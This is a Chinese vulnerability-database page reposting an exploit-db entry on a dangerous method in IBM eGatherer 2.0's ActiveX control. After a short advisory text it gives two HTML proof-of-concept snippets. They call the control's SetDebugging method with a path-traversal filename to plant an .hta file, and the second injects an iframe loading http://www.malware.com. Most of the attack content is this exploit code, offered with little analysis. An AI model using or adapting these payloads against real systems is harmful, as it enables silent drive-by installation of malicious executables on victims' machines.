IBM EGatherer 2.0 – ActiveX Control Dangerous Method

IBM EGatherer 2.0 – ActiveX Control Dangerous Method

漏洞ID 1054480 漏洞类型
发布时间 2004-06-01 更新时间 2004-06-01
图片[1]-IBM EGatherer 2.0 – ActiveX Control Dangerous Method-安全小百科CVE编号 N/A
图片[2]-IBM EGatherer 2.0 – ActiveX Control Dangerous Method-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24220
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10562/info

It is reported that the IBM eGatherer ActiveX control contains dangerous methods that may result in a remote compromise of a system on which the ActiveX control is installed. These methods may be accessed by a malicious website and may result in the silent installation of a malicious executable.

A remote attacker may exploit this vulnerability in order to silently install a malicious executable on an affected system.

-----------EXAMPLE HTML 1 ---------
//first this page would be viewed, then through refreshing or whatever
one goes to the second page (or just timing the two calls with
SetTimeOUt and putting them on the same page...)
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|

|script|
X.SetDebugging("/../xx.hta",-1);
|script|
---------------------------------

-----------EXAMPLE HTML 2 ---------
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|

|script|
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
|script|


---------------------------------

相关推荐: Yahoo! Voice Chat ActiveX Control Buffer Overflow Vulnerability

Yahoo! Voice Chat ActiveX Control Buffer Overflow Vulnerability 漏洞ID 1100354 漏洞类型 Boundary Condition Error 发布时间 2003-05-12 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享